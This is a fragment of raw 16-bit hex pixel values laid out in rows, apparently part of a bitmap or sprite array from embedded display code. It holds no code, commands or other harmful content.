0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 